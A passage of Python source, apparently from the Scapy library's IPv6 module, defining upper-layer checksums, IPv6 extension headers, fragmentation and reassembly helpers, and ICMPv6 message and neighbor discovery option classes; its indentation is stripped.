return s1[:l] == s2[:l]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
### Upper Layer Checksum computation ###
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [ IP6Field("src", "::"),
IP6Field("dst", "::"),
ShortField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0) ]
def in6_chksum(nh, u, p):
"""
As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
Performs IPv6 Upper Layer checksum computation. Provided parameters are:
- 'nh' : value of upper layer protocol
- 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
provided with all under layers (IPv6 and all extension headers,
for example)
- 'p' : the payload of the upper layer provided as a string
Functions operate by filling a pseudo header class instance (PseudoIPv6)
with
- Next Header value
- the address of _final_ destination (if some Routing Header with non
segleft field is present in underlayer classes, last address is used.)
- the address of _real_ source (basically the source address of an
IPv6 class instance available in the underlayer or the source address
in HAO option if some Destination Option header found in underlayer
includes this option).
- the length is the length of provided payload string ('p')
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u != None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = raw(ph6)
return checksum(ph6s+p)
#############################################################################
#############################################################################
### Extension Headers ###
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPV6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
#################### IPv6 options for Extension Headers #####################
_hbhopts = { 0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option" }
class _OTypeField(ByteEnumField):
"""
Modified BytEnumField that displays information regarding the IPv6 option
based on its option type value (What should be done by nodes that process
the option if they do not understand it ...)
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route" }
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen) ]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
As specified in section 4.2 of RFC 2460, every options has
an alignment requirement ususally expressed xn+y, meaning
the Option Type must appear at an integer multiple of x octest
from the start of the header, plus y octet.
That function is provided the current position from the
start of the header and returns required padding length.
"""
return 0
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{ 0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message",
68: "NSIS NATFW NSLP",
69: "MPLS OAM",
65535: "Reserved" })]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption
# TODO : Now that we have that option, we should do something in MLD class that need it
# TODO : IANA has defined ranges of values which can't be easily represented here.
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2 ; y = 0
delta = x*((curpos - y + x - 1)//x) + y - curpos
return delta
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None) ]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4 ; y = 2
delta = x*((curpos - y + x - 1)//x) + y - curpos
return delta
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::") ]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8 ; y = 6
delta = x*((curpos - y + x - 1)//x) + y - curpos
return delta
_hbhoptcls = { 0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO }
######################## Hop-by-Hop Extension Header ########################
class _HopByHopOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def i2len(self, pkt, i):
l = len(self.i2m(pkt, i))
return l
def i2count(self, pkt, i):
if isinstance(i, list):
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
opt = []
ret = b""
x = s
if l is not None:
x,ret = s[:l],s[l:]
while x:
if c is not None:
if c <= 0:
break
c -= 1
o = ord(x[0]) # Option type
cls = self.cls
if o in _hbhoptcls:
cls = _hbhoptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = b""
return x+ret,opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return b"".join(map(str, x))
curpos = self.curpos
s = b""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00'*(d-2)))
pstr = raw(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)//8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 0 }}
######################## Destination Option Header ##########################
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)//8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 60 }}
############################# Routing Header ################################
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ...
IP6ListField("addresses", [],
length_from = lambda pkt: 8*pkt.len)]
overload_fields = {IPv6: { "nh": 43 }}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
######################### Segment Routing Header ############################
# This implementation is based on draft 06, available at:
# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
class IPv6ExtHdrSegmentRoutingTLV(Packet):
name = "IPv6 Option Header Segment Routing - Generic TLV"
fields_desc = [ ByteField("type", 0),
ByteField("len", 0),
ByteField("reserved", 0),
ByteField("flags", 0),
StrLenField("value", "", length_from=lambda pkt: pkt.len) ]
def extract_padding(self, p):
return b"",p
registered_sr_tlv = {}
@classmethod
def register_variant(cls):
cls.registered_sr_tlv[cls.type.default] = cls
@classmethod
def dispatch_hook(cls, pkt=None, *args, **kargs):
if pkt:
tmp_type = ord(pkt[0])
return cls.registered_sr_tlv.get(tmp_type, cls)
return cls
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
fields_desc = [ ByteField("type", 1),
ByteField("len", 18),
ByteField("reserved", 0),
ByteField("flags", 0),
IP6Field("ingress_node", "::1") ]
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Egress Node TLV"
fields_desc = [ ByteField("type", 2),
ByteField("len", 18),
ByteField("reserved", 0),
ByteField("flags", 0),
IP6Field("egress_node", "::1") ]
class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Padding TLV"
fields_desc = [ ByteField("type", 4),
FieldLenField("len", None, length_of="padding", fmt="B"),
StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len) ]
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Segment Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteField("type", 4),
ByteField("segleft", None),
ByteField("lastentry", None),
BitField("unused1", 0, 1),
BitField("protected", 0, 1),
BitField("oam", 0, 1),
BitField("alert", 0, 1),
BitField("hmac", 0, 1),
BitField("unused2", 0, 3),
ShortField("tag", 0),
IP6ListField("addresses", ["::1"],
count_from=lambda pkt: pkt.lastentry),
PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV,
length_from=lambda pkt: 8*pkt.len - 16*pkt.lastentry) ]
overload_fields = { IPv6: { "nh": 43 } }
def post_build(self, pkt, pay):
if self.len is None:
# The extension must be align on 8 bytes
tmp_mod = (len(pkt) - 8) % 8
if tmp_mod == 1:
warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte !")
elif tmp_mod >= 2:
#Add the padding extension
tmp_pad = b"\x00" * (tmp_mod-2)
tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad)
pkt += raw(tlv)
tmp_len = (len(pkt) - 8) // 8
pkt = pkt[:1] + struct.pack("B", tmp_len)+ pkt[2:]
if self.segleft is None:
tmp_len = len(self.addresses)
if tmp_len:
tmp_len -= 1
pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
if self.lastentry is None:
pkt = pkt[:4] + struct.pack("B", len(self.addresses)) + pkt[5:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
########################### Fragmentation Header ############################
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None) ]
overload_fields = {IPv6: { "nh": 44 }}
def defragment6(packets):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
Crap is dropped. What lacks is completed by 'X' characters.
"""
l = [x for x in packets if IPv6ExtHdrFragment in x] # remove non fragments
if not l:
return []
id = l[0][IPv6ExtHdrFragment].id
llen = len(l)
l = [x for x in l if x[IPv6ExtHdrFragment].id == id]
if len(l) != llen:
warning("defragment6: some fragmented packets have been removed from list")
llen = len(l)
# reorder fragments
i = 0
res = []
while l:
min_pos = 0
min_offset = l[0][IPv6ExtHdrFragment].offset
for p in l:
cur_offset = p[IPv6ExtHdrFragment].offset
if cur_offset < min_offset:
min_pos = 0
min_offset = cur_offset
res.append(l[min_pos])
del(l[min_pos])
# regenerate the fragmentable part
fragmentable = b""
for p in res:
q=p[IPv6ExtHdrFragment]
offset = 8*q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
fragmentable += b"X"*(offset - len(fragmentable))
fragmentable += raw(q.payload)
# Regenerate the unfragmentable part.
q = res[0]
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
del q[IPv6ExtHdrFragment].underlayer.payload
q /= conf.raw_layer(load=fragmentable)
return IPv6(raw(q))
def fragment6(pkt, fragSize):
"""
Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
maximum size of fragments (MTU). The list of packets is returned.
If packet does not contain an IPv6ExtHdrFragment class, it is returned in
result list.
"""
pkt = pkt.copy()
if not IPv6ExtHdrFragment in pkt:
# TODO : automatically add a fragment before upper Layer
# at the moment, we do nothing and return initial packet
# as single element of a list
return [pkt]
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
return []
s = raw(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = raw(IPv6(src="::1", dst="::1")/fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = pkt[IPv6ExtHdrFragment].nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
del fragHeader.payload # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
# Cut the fragmentable part to fit fragSize. Inner fragments have
# a length that is an integer multiple of 8 octets. last Frag MTU
# can be anything below MTU
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart/fragHeader/fragPart]
remain = fragPartStr
res = []
fragOffset = 0 # offset, incremeted during creation
fragId = random.randint(0,0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize // 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
res.append(tempo)
else:
fragHeader.offset = fragOffset # update offSet
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
res.append(tempo)
break
return res
############################### AH Header ###################################
# class _AHFieldLenField(FieldLenField):
# def getfield(self, pkt, s):
# l = getattr(pkt, self.fld)
# l = (l*8)-self.shift
# i = self.m2i(pkt, s[:l])
# return s[l:],i
# class _AHICVStrLenField(StrLenField):
# def i2len(self, pkt, x):
# class IPv6ExtHdrAH(_IPv6ExtHdr):
# name = "IPv6 Extension Header - AH"
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
# _AHFieldLenField("len", None, "icv"),
# ShortField("res", 0),
# IntField("spi", 0),
# IntField("sn", 0),
# _AHICVStrLenField("icv", None, "len", shift=2) ]
# overload_fields = {IPv6: { "nh": 51 }}
# def post_build(self, pkt, pay):
# if self.len is None:
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
# if self.segleft is None:
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
# return _IPv6ExtHdr.post_build(self, pkt, pay)
############################### ESP Header ##################################
# class IPv6ExtHdrESP(_IPv6extHdr):
# name = "IPv6 Extension Header - ESP"
# fields_desc = [ IntField("spi", 0),
# IntField("sn", 0),
# # there is things to extract from IKE work
# ]
# overloads_fields = {IPv6: { "nh": 50 }}
#############################################################################
#############################################################################
### ICMPv6* Classes ###
#############################################################################
#############################################################################
icmp6typescls = { 1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery",
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
#138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
#143: Do Me - RFC 3810
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
#148: Do Me - SEND related - RFC 3971
#149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
}
icmp6typesminhdrlen = { 1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
#139:
#140
141: 8,
142: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4
}
icmp6types = { 1 : "Destination unreachable",
2 : "Packet too big",
3 : "Time exceeded",
4 : "Parameter problem",
100 : "Private Experimentation",
101 : "Private Experimentation",
128 : "Echo Request",
129 : "Echo Reply",
130 : "MLD Query",
131 : "MLD Report",
132 : "MLD Done",
133 : "Router Solicitation",
134 : "Router Advertisement",
135 : "Neighbor Solicitation",
136 : "Neighbor Advertisement",
137 : "Redirect Message",
138 : "Router Renumbering",
139 : "ICMP Node Information Query",
140 : "ICMP Node Information Response",
141 : "Inverse Neighbor Discovery Solicitation Message",
142 : "Inverse Neighbor Discovery Advertisement Message",
143 : "Version 2 Multicast Listener Report",
144 : "Home Agent Address Discovery Request Message",
145 : "Home Agent Address Discovery Reply Message",
146 : "Mobile Prefix Solicitation",
147 : "Mobile Prefix Advertisement",
148 : "Certification Path Solicitation",
149 : "Certification Path Advertisement",
151 : "Multicast Router Advertisement",
152 : "Multicast Router Solicitation",
153 : "Multicast Router Termination",
200 : "Private Experimentation",
201 : "Private Experimentation" }
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum == None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2]+struct.pack("!H", chksum)+p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self,p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
StrField("msgbody", "")]
################################## RFC 2460 #################################
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteEnumField("code",0, { 0: "No route to destination",
1: "Communication with destination administratively prohibited",
2: "Beyond scope of source address",
3: "Address unreachable",
4: "Port unreachable" }),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ ByteEnumField("type",2, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("mtu",1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ ByteEnumField("type",3, icmp6types),
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
1: "fragment reassembly time exceeded"}),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ ByteEnumField("type",4, icmp6types),
ByteEnumField("code",0, {0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered"}),
XShortField("cksum", None),
IntField("ptr",6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id",0),
XShortField("seq",0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
# tous les messages MLD sont emis avec une adresse source lien-locale
# -> Y veiller dans le post_build si aucune n'est specifiee
# La valeur de Hop-Limit doit etre de 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr","::")]
# general queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000 # 10s for mrd
mladdr = "::"
overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
def hashret(self):
if self.mladdr != "::":
return (
inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret()
)
else:
return self.payload.hashret()
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
# implementer le hashret et le answers
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
icmp6ndopts = { 1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recusive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
#11: Do Me,
#12: Do Me,
#13: Do Me,
#14: Do Me,
#15: Do Me,
#16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
#18: Do Me,
#19: Do Me,
#20: Do Me,
#21: Do Me,
#22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA",
31: "ICMPv6NDOptDNSSL"
}
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self,p):
if len(p) > 1:
return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ ByteField("type",None),
FieldLenField("len",None,length_of="data",fmt="B",
adjust = lambda pkt,x: x+2),
StrLenField("data","",
length_from = lambda pkt: pkt.len-2) ]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revoir le coup du ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY) ]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
